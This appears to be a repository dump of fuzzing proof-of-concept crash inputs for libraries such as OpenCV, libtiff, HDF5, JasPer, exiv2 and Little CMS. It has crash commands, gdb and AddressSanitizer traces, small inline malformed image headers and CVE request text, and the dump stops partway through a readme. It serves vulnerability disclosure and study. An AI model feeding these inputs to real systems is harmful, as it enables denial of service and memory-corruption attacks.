├── .gitignore ├── exiv2 ├── 8-readData-abort-1 ├── 7-printIFD-divbyzero-1 ├── 4-DataBuf-abort-1 ├── 1-string-format.jpg ├── 2-invalid-memory-access ├── 3-stringformat-outofbound-read ├── 5-printStructure-outbound-read-1 ├── 6-binaryToString-outbound-read-1 ├── 9-printStructure-outbound-read-1 └── 10-printStructure-outbound-read-2 ├── gegl ├── gegl-outbound-write-1 ├── gegl-dos-1 ├── gegl-dos-2 ├── gegl-dos-3 ├── gegl-outbound-write-2 └── readme.md ├── pics ├── bug8.PNG └── dos.PNG ├── cimg ├── cimg-crash-1 ├── cimg-double-free-1 ├── cimg-dos-load_bmp-1 ├── cimg-heap-overflow-1 ├── cimg-heap-overflow-load_bmp-48378 ├── cimg-heap-overflow-load_bmp-48397 ├── cimg-heap-overflow-load_bmp-48413 ├── cimg-heap-overflow-load_bmp-48427 ├── cimg-heap-overflow-load_bmp-48457 └── readme.md ├── netpbm ├── pstopnm-divbyzero-2 ├── pstopnm-divbyzero-1 ├── pbmmask-heapoverflow-1 ├── tifftopnm-heapoverflow-1 ├── images │ └── pstopnm-divbyzero-1.png └── readme.md ├── cms ├── 9-cms-heap-overflow ├── 8-cms-crash-UnrollDoubleTo16 ├── 6-cms-invalid-access-Pack3Bytes ├── tiff-crash-TIFFWriteEncodeTile ├── 13-cms-null-pointer-FastIdentity16 ├── 15-cms-null-pointer-UnrollAnyWords ├── 5-cms-invalid-access-cmsReadHeader ├── 10-cms-invalid-read-PackPlanarBytes ├── 12-cms-invalid-access-EvaluateCurves ├── 1-cms-out-bound-write-PrecalculateXFORM ├── 3-cms-NULL-Pointer-cmsEvalToneCurve16 ├── 14-cms-invalid-access-Unroll1ByteReversed ├── 4-cms-invalid-access-AllocateToneCurveStruct ├── 11-cms-invalid-write-cmsPipelineCheckAndRetreiveStages ├── 7-cms-null-pointer-cmsPipelineCheckAndRetreiveStages └── readme.md ├── gifsicle ├── gifsicle-poc-1 └── readme.md ├── hdf5 ├── images │ ├── null-1.png │ ├── null-2.png │ ├── divzero-1.PNG │ ├── divzero-2.PNG │ ├── outboundread-1.png │ ├── outboundread-2.png │ ├── outboundread-3.png │ ├── outboundread-4.png │ └── hdf5-heapoverflow.png ├── 1-hdf5-divbyzero-H5T_set_loc ├── 2-hdf5-null-pointer-H5O_pline_decode ├── 3-hdf5-outbound-read-H5T_conv_struct_opt ├── 5-hdf5-heap-overflow-H5G__ent_decode_vec ├── 4-hdf5-outbound-read-H5Opline_pline_decode └── readme.md ├── libtiff ├── 1-tiffinfo-c-null └── readme.md ├── jasper ├── 001-jasper-aborted-1 ├── 002-jasper-aborted-2 ├── 003-jasper-aborted-3 ├── 004-jasper-aborted-4 ├── 005-jasper-aborted-5 ├── 006-jasper-aborted-6 └── 026-jasper-jps_decode-heapoverflow ├── libav ├── 1-avconv-divbyzero.wav ├── 1-avconv-divbyzero.flac └── readme.md ├── opencv ├── dos-by-assert │ ├── dos-1 │ ├── dos-2 │ ├── dos-3 │ └── readme.md ├── 11-opencv-dos-cpu-exhaust ├── 10-opencv-dos-memory-exhaust ├── 2-opencv-heapoverflow-fseek ├── 8-opencv-invalid-read-fread ├── 4-buf-overflow-readData-memcpy ├── 6-opencv-outbound-write-readData ├── 7-opencv-outbound-write-FillUnicolor ├── 1-opencv-outbound-write-FillColorRow4 ├── 12-opencv-outbound-write-FillColorRow1 ├── 3-opencv-outbound-write-FillColorRow8 ├── 5-opencv-outbound-write-FillColorRow1 ├── 9-opencv-invalid-write-icvCvt_BGRA2BGR_8u_C4C3R ├── 13-opencv-10h-dos └── readme.md ├── openexr └── 185-openexr-heapoverflow ├── cve-request ├── cve-request-3.txt ├── cve-request-2.txt └── cve-request-1.txt ├── README.md~ ├── jasper.md ├── README.md └── openexr.md /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | peda* 3 | cve-request/* 4 | -------------------------------------------------------------------------------- /exiv2/8-readData-abort-1: -------------------------------------------------------------------------------- 1 | II+ -------------------------------------------------------------------------------- /exiv2/7-printIFD-divbyzero-1: -------------------------------------------------------------------------------- 1 | II+ -------------------------------------------------------------------------------- /gegl/gegl-outbound-write-1: -------------------------------------------------------------------------------- 1 | P6 2 | 725583137+4 3 | 255 -------------------------------------------------------------------------------- /pics/bug8.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/pics/bug8.PNG -------------------------------------------------------------------------------- /pics/dos.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/pics/dos.PNG -------------------------------------------------------------------------------- /gegl/gegl-dos-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/gegl/gegl-dos-1 -------------------------------------------------------------------------------- /gegl/gegl-dos-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/gegl/gegl-dos-2 -------------------------------------------------------------------------------- /gegl/gegl-dos-3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/gegl/gegl-dos-3 -------------------------------------------------------------------------------- /cimg/cimg-crash-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-crash-1 -------------------------------------------------------------------------------- /netpbm/pstopnm-divbyzero-2: -------------------------------------------------------------------------------- 1 | %!PS.0 EPS) 2 | 3 | %%C15) 4 | %%BoundingBox: 0 2 113737 3 -------------------------------------------------------------------------------- /cimg/cimg-double-free-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-double-free-1 -------------------------------------------------------------------------------- /cms/9-cms-heap-overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/9-cms-heap-overflow -------------------------------------------------------------------------------- /exiv2/4-DataBuf-abort-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/4-DataBuf-abort-1 -------------------------------------------------------------------------------- /gifsicle/gifsicle-poc-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/gifsicle/gifsicle-poc-1 -------------------------------------------------------------------------------- /hdf5/images/null-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/null-1.png -------------------------------------------------------------------------------- /hdf5/images/null-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/null-2.png -------------------------------------------------------------------------------- /cimg/cimg-dos-load_bmp-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-dos-load_bmp-1 -------------------------------------------------------------------------------- /cimg/cimg-heap-overflow-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-heap-overflow-1 -------------------------------------------------------------------------------- /exiv2/1-string-format.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/1-string-format.jpg -------------------------------------------------------------------------------- /hdf5/images/divzero-1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/divzero-1.PNG -------------------------------------------------------------------------------- /hdf5/images/divzero-2.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/divzero-2.PNG -------------------------------------------------------------------------------- /libtiff/1-tiffinfo-c-null: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/libtiff/1-tiffinfo-c-null -------------------------------------------------------------------------------- /netpbm/pstopnm-divbyzero-1: -------------------------------------------------------------------------------- 1 | %!PS.0 EPSF-3.0 2 | ew) 3 | 4 | %%C15) 5 | %%BoundingBox: 0 3 137 3 -------------------------------------------------------------------------------- /gegl/gegl-outbound-write-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/gegl/gegl-outbound-write-2 -------------------------------------------------------------------------------- /jasper/001-jasper-aborted-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/001-jasper-aborted-1 -------------------------------------------------------------------------------- /jasper/002-jasper-aborted-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/002-jasper-aborted-2 -------------------------------------------------------------------------------- /jasper/003-jasper-aborted-3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/003-jasper-aborted-3 -------------------------------------------------------------------------------- /jasper/004-jasper-aborted-4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/004-jasper-aborted-4 -------------------------------------------------------------------------------- /jasper/005-jasper-aborted-5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/005-jasper-aborted-5 -------------------------------------------------------------------------------- /jasper/006-jasper-aborted-6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/006-jasper-aborted-6 -------------------------------------------------------------------------------- /libav/1-avconv-divbyzero.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/libav/1-avconv-divbyzero.wav -------------------------------------------------------------------------------- /opencv/dos-by-assert/dos-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/dos-by-assert/dos-1 -------------------------------------------------------------------------------- /opencv/dos-by-assert/dos-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/dos-by-assert/dos-2 -------------------------------------------------------------------------------- /opencv/dos-by-assert/dos-3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/dos-by-assert/dos-3 -------------------------------------------------------------------------------- /exiv2/2-invalid-memory-access: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/2-invalid-memory-access -------------------------------------------------------------------------------- /hdf5/images/outboundread-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/outboundread-1.png -------------------------------------------------------------------------------- /hdf5/images/outboundread-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/outboundread-2.png -------------------------------------------------------------------------------- /hdf5/images/outboundread-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/outboundread-3.png -------------------------------------------------------------------------------- /hdf5/images/outboundread-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/outboundread-4.png -------------------------------------------------------------------------------- /libav/1-avconv-divbyzero.flac: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/libav/1-avconv-divbyzero.flac -------------------------------------------------------------------------------- /netpbm/pbmmask-heapoverflow-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/netpbm/pbmmask-heapoverflow-1 -------------------------------------------------------------------------------- /cms/8-cms-crash-UnrollDoubleTo16: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/8-cms-crash-UnrollDoubleTo16 -------------------------------------------------------------------------------- /hdf5/1-hdf5-divbyzero-H5T_set_loc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/1-hdf5-divbyzero-H5T_set_loc -------------------------------------------------------------------------------- /hdf5/images/hdf5-heapoverflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/images/hdf5-heapoverflow.png -------------------------------------------------------------------------------- /netpbm/tifftopnm-heapoverflow-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/netpbm/tifftopnm-heapoverflow-1 -------------------------------------------------------------------------------- /opencv/11-opencv-dos-cpu-exhaust: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/11-opencv-dos-cpu-exhaust -------------------------------------------------------------------------------- /openexr/185-openexr-heapoverflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/openexr/185-openexr-heapoverflow -------------------------------------------------------------------------------- /cms/6-cms-invalid-access-Pack3Bytes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/6-cms-invalid-access-Pack3Bytes -------------------------------------------------------------------------------- /cms/tiff-crash-TIFFWriteEncodeTile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/tiff-crash-TIFFWriteEncodeTile -------------------------------------------------------------------------------- /opencv/10-opencv-dos-memory-exhaust: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/10-opencv-dos-memory-exhaust -------------------------------------------------------------------------------- /opencv/2-opencv-heapoverflow-fseek: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/2-opencv-heapoverflow-fseek -------------------------------------------------------------------------------- /opencv/8-opencv-invalid-read-fread: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/8-opencv-invalid-read-fread -------------------------------------------------------------------------------- /cimg/cimg-heap-overflow-load_bmp-48378: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-heap-overflow-load_bmp-48378 -------------------------------------------------------------------------------- /cimg/cimg-heap-overflow-load_bmp-48397: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-heap-overflow-load_bmp-48397 -------------------------------------------------------------------------------- /cimg/cimg-heap-overflow-load_bmp-48413: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-heap-overflow-load_bmp-48413 -------------------------------------------------------------------------------- /cimg/cimg-heap-overflow-load_bmp-48427: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-heap-overflow-load_bmp-48427 -------------------------------------------------------------------------------- /cimg/cimg-heap-overflow-load_bmp-48457: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cimg/cimg-heap-overflow-load_bmp-48457 -------------------------------------------------------------------------------- /cms/13-cms-null-pointer-FastIdentity16: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/13-cms-null-pointer-FastIdentity16 -------------------------------------------------------------------------------- /cms/15-cms-null-pointer-UnrollAnyWords: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/15-cms-null-pointer-UnrollAnyWords -------------------------------------------------------------------------------- /cms/5-cms-invalid-access-cmsReadHeader: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/5-cms-invalid-access-cmsReadHeader -------------------------------------------------------------------------------- /exiv2/3-stringformat-outofbound-read: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/3-stringformat-outofbound-read -------------------------------------------------------------------------------- /exiv2/5-printStructure-outbound-read-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/5-printStructure-outbound-read-1 -------------------------------------------------------------------------------- /exiv2/6-binaryToString-outbound-read-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/6-binaryToString-outbound-read-1 -------------------------------------------------------------------------------- /exiv2/9-printStructure-outbound-read-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/9-printStructure-outbound-read-1 -------------------------------------------------------------------------------- /netpbm/images/pstopnm-divbyzero-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/netpbm/images/pstopnm-divbyzero-1.png -------------------------------------------------------------------------------- /opencv/4-buf-overflow-readData-memcpy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/4-buf-overflow-readData-memcpy -------------------------------------------------------------------------------- /cms/10-cms-invalid-read-PackPlanarBytes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/10-cms-invalid-read-PackPlanarBytes -------------------------------------------------------------------------------- /cms/12-cms-invalid-access-EvaluateCurves: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/12-cms-invalid-access-EvaluateCurves -------------------------------------------------------------------------------- /exiv2/10-printStructure-outbound-read-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/exiv2/10-printStructure-outbound-read-2 -------------------------------------------------------------------------------- /opencv/6-opencv-outbound-write-readData: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/6-opencv-outbound-write-readData -------------------------------------------------------------------------------- /cms/1-cms-out-bound-write-PrecalculateXFORM: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/1-cms-out-bound-write-PrecalculateXFORM -------------------------------------------------------------------------------- /cms/3-cms-NULL-Pointer-cmsEvalToneCurve16: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/3-cms-NULL-Pointer-cmsEvalToneCurve16 -------------------------------------------------------------------------------- /hdf5/2-hdf5-null-pointer-H5O_pline_decode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/2-hdf5-null-pointer-H5O_pline_decode -------------------------------------------------------------------------------- /jasper/026-jasper-jps_decode-heapoverflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/jasper/026-jasper-jps_decode-heapoverflow -------------------------------------------------------------------------------- /opencv/7-opencv-outbound-write-FillUnicolor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/7-opencv-outbound-write-FillUnicolor -------------------------------------------------------------------------------- /cms/14-cms-invalid-access-Unroll1ByteReversed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/14-cms-invalid-access-Unroll1ByteReversed -------------------------------------------------------------------------------- /hdf5/3-hdf5-outbound-read-H5T_conv_struct_opt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/3-hdf5-outbound-read-H5T_conv_struct_opt -------------------------------------------------------------------------------- /hdf5/5-hdf5-heap-overflow-H5G__ent_decode_vec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/5-hdf5-heap-overflow-H5G__ent_decode_vec -------------------------------------------------------------------------------- /opencv/1-opencv-outbound-write-FillColorRow4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/1-opencv-outbound-write-FillColorRow4 -------------------------------------------------------------------------------- /opencv/12-opencv-outbound-write-FillColorRow1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/12-opencv-outbound-write-FillColorRow1 -------------------------------------------------------------------------------- /opencv/3-opencv-outbound-write-FillColorRow8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/3-opencv-outbound-write-FillColorRow8 -------------------------------------------------------------------------------- /opencv/5-opencv-outbound-write-FillColorRow1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/5-opencv-outbound-write-FillColorRow1 -------------------------------------------------------------------------------- /cms/4-cms-invalid-access-AllocateToneCurveStruct: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/4-cms-invalid-access-AllocateToneCurveStruct -------------------------------------------------------------------------------- /hdf5/4-hdf5-outbound-read-H5Opline_pline_decode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/hdf5/4-hdf5-outbound-read-H5Opline_pline_decode -------------------------------------------------------------------------------- /opencv/9-opencv-invalid-write-icvCvt_BGRA2BGR_8u_C4C3R: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/opencv/9-opencv-invalid-write-icvCvt_BGRA2BGR_8u_C4C3R -------------------------------------------------------------------------------- /cms/11-cms-invalid-write-cmsPipelineCheckAndRetreiveStages: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/11-cms-invalid-write-cmsPipelineCheckAndRetreiveStages -------------------------------------------------------------------------------- /cms/7-cms-null-pointer-cmsPipelineCheckAndRetreiveStages: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoqx/pocs/HEAD/cms/7-cms-null-pointer-cmsPipelineCheckAndRetreiveStages -------------------------------------------------------------------------------- /libav/readme.md: -------------------------------------------------------------------------------- 1 | libav pocs 2 | =========== 3 | 4 | ## 1-avconv-divbyzero 5 | 6 | gdb --args ../avconv -i 1-avconv-divbyzero.wav -i 1-libav-divbyzero.flac -f avi merge.avi 7 | 8 | 9 | Program received signal SIGFPE, Arithmetic exception. 10 | 0x000000000046b38b in process_input_packet (ist=0x6cdd60, no_eof=no_eof@entry=0, pkt=0x0) 11 | at avtools/avconv.c:1586 12 | 1586 ist->next_dts += ((int64_t)AV_TIME_BASE * ist->dec_ctx->frame_size) / 13 | 1587 ist->dec_ctx->sample_rate; 14 | 15 | 16 | ref: 17 | https://bugzilla.libav.org/show_bug.cgi?id=1117 18 | -------------------------------------------------------------------------------- /cve-request/cve-request-3.txt: -------------------------------------------------------------------------------- 1 | Description: 2 | 3 | OpenCV (http://opencv.org/) 4 | OpenCV (Open Source Computer Vision Library) 5 | before 3.3 (including 3.3) 6 | 7 | OpenCV (Open Source Computer Vision Library) is an open source computer vision and machine learning software library. 8 | A heap-based buf overflow results to invalid write in fseek when reads an image file by using cv::imread. 9 | 10 | OpenCV (Open Source Computer Vision Library) is an open source computer vision and machine learning software library. 11 | An out of bound write error occurs in function FillColorRow4 when reads an image file by using cv::imread. 12 | 13 | 14 | the bug is found by Qixue Xiao and Kang Li. 15 | 16 | 17 | https://github.com/opencv/opencv/issues/9309 18 | https://github.com/xiaoqx/pocs/blob/master/opencv.md 19 | https://github.com/xiaoqx/pocs/blob/master/opencv/1-opencv-outbound-write-FillColorRow4 20 | -------------------------------------------------------------------------------- /hdf5/readme.md: -------------------------------------------------------------------------------- 1 | hdf5 pocs 2 | ============= 3 | 4 | 5 | ## 1-hdf5-divbyzero-H5T_set_loc 6 | 7 | ./hdf5dump 1-hdf5-divbyzero-H5T_set_loc 8 | 9 | ![](./images/divzero-1.PNG) 10 | 11 | ![](./images/divzero-2.PNG) 12 | 13 | ## 2-hdf5-null-pointer-H5O_pline_decode 14 | 15 | ./hdf5dump 2-hdf5-null-pointer-H5O_pline_decode 16 | 17 | ![](./images/null-1.png) 18 | 19 | ![](./images/null-2.png) 20 | 21 | 22 | ## 3-hdf5-outbound-read-H5T_conv_struct_opt 23 | 24 | ./hdf5dump 3-hdf5-outbound-read-H5T_conv_struct_opt 25 | 26 | ![](./images/outboundread-1.png) 27 | 28 | ![](./images/outboundread-2.png) 29 | 30 | 31 | ## 4-hdf5-outbound-read-H5Opline_pline_decode 32 | 33 | ./hdf5dump 4-hdf5-outbound-read-H5Opline_pline_decode 34 | 35 | ![](./images/outboundread-3.png) 36 | 37 | ![](./images/outboundread-4.png) 38 | 39 | 40 | 41 | ## 5-hdf5-heap-overflow-H5G__ent_decode_vec 42 | 43 | ./hdf5dump 5-hdf5-heap-overflow-H5G__ent_decode_vec 44 | 45 | ![](./images/hdf5-heapoverflow.png) 46 | 47 | 48 | -------------------------------------------------------------------------------- /opencv/13-opencv-10h-dos: -------------------------------------------------------------------------------- 1 | P1 .111111111111111111111111111111 11G1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111#111 -------------------------------------------------------------------------------- /libtiff/readme.md: -------------------------------------------------------------------------------- 1 | poc of libtiff 2 | ================= 3 | 4 | 5 | ## 1. null pointer dereference of tiffinfo (1-tiffinfo-c-null) 6 | 7 | A NULL Pointer Dereference in function TIFFPrintDirectory in tif_print.c 8 | when using tiffinfo tool to print the crafted tiff information. 9 | 10 | ``` 11 | $ tiffinfo -c $FILE 12 | 13 | ASAN:SIGSEGV 14 | ================================================================= 15 | ==172==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f3b8f83a44f bp 0x000000000000 sp 0x7ffd7cacd6b0 T0) 16 | #0 0x7f3b8f83a44e in TIFFPrintDirectory /src/libtiff/libtiff/tif_print.c:549 17 | #1 0x402329 in tiffinfo /src/libtiff/tools/tiffinfo.c:461 18 | #2 0x402329 in main /src/libtiff/tools/tiffinfo.c:150 19 | #3 0x7f3b8f2ce82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 20 | #4 0x402888 in _start (/src/aflbuild/installed/bin/tiffinfo+0x402888) 21 | 22 | AddressSanitizer can not provide additional info. 23 | SUMMARY: AddressSanitizer: SEGV /src/libtiff/libtiff/tif_print.c:549 TIFFPrintDirectory 24 | ==172==ABORTING 25 | 26 | 27 | ``` 28 | 29 | ref: 30 | 31 | http://bugzilla.maptools.org/show_bug.cgi?id=2778 32 | -------------------------------------------------------------------------------- /README.md~: -------------------------------------------------------------------------------- 1 | # pocs 2 | pocs of tested targets 3 | 4 | ### 001-jasper-aborted-1 5 | ``` 6 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 7 | Aborted 8 | ``` 9 | 10 | 11 | ### 002-jasper-aborted-2 12 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 13 | jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_t1cod.c:144: JPC_NOMINALGAIN: Assertion `qmfbid == 0x01' failed. 14 | Aborted 15 | 16 | 17 | ### 003-jasper-aborted-3 18 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 19 | warning: ignoring unknown marker segment (0xffff) 20 | type = 0xffff (UNKNOWN); len = 19;40 40 48 48 50 48 48 50 48 48 50 48 48 45 48 48 50 jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_t1cod.c:144: JPC_NOMINALGAIN: Assertio 21 | n `qmfbid == 0x01' failed. 22 | Aborted 23 | 24 | ### 004-jasper-aborted-4 25 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 26 | warning: trailing garbage in marker segment (15 bytes) 27 | jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_t1cod.c:144: JPC_NOMINALGAIN: Assertion `qmfbid == 0x01' failed. 28 | Aborted 29 | 30 | ### 005-jasper-aborted-5 31 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 32 | warning: ignoring trailing garbage (1 bytes) 33 | jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_dec.c:1883: jpc_dequantize: Assertion `absstepsize >= 0' failed. 34 | Aborted 35 | 36 | ### 006-jasper-aborted-6 37 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 38 | warning: ignoring unknown marker segment (0xff7e) 39 | type = 0xff7e (UNKNOWN); len = 20;01 40 40 ff ff 80 00 48 50 40 48 50 48 48 50 48 48 50 warning: trailing garbage in marker segment (1 bytes) 40 | warning: ignoring unknown marker segment (0xff0d) 41 | type = 0xff0d (UNKNOWN); len = 20;00 40 40 00 00 00 00 00 00 00 00 e9 00 ff 80 e9 00 00 jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_dec.c:1883: jpc_dequantize: Assertion `absstepsize >= 0' failed. 42 | Aborted 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /jasper.md: -------------------------------------------------------------------------------- 1 | # pocs 2 | pocs of libjasper 3 | 4 | ### 001-jasper-aborted-1 5 | ``` 6 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 7 | Aborted 8 | ``` 9 | 10 | 11 | ### 002-jasper-aborted-2 12 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 13 | ``` 14 | jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_t1cod.c:144: JPC_NOMINALGAIN: Assertion `qmfbid == 0x01' failed. 15 | Aborted 16 | ``` 17 | 18 | 19 | ### 003-jasper-aborted-3 20 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 21 | ``` 22 | warning: ignoring unknown marker segment (0xffff) 23 | type = 0xffff (UNKNOWN); len = 19;40 40 48 48 50 48 48 50 48 48 50 48 48 45 48 48 50 jasper: 